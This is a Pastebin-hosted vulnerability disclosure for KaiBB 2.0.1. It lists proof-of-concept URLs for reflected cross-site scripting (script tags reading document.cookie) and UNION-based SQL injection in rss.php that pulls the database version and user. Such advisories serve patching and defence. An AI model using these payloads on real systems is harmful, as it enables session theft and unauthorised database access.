Guest User

Untitled

a guest
Oct 11th, 2011
28
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.72 KB | None | 0 0
  1. Vulnerability Description:
  2. ==========================
  3.  
  4. KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities
  5.  
  6. ==================
  7. Technical Details:
  8. ==================
  9.  
  10. Cross-site Scripting
  11.  
  12. http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
  13. http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>
  14.  
  15. SQL Injection
  16.  
  17. http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
  18. http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
  19. http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
  20.  
  21.  
  22. # [2011-10-10]
  23.  
Advertisement
Add Comment
Please, Sign In to add comment